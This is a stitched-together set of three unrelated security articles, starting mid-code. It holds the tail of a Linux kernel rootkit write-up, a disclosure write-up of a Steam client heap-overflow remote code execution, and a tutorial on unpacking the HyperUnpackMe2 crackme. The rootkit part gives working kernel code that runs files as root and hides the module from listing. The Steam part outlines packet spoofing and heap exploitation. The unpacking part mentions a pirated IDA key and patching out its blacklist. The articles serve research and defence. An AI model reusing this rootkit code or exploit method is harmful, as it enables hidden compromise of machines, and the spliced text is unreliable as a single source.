		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

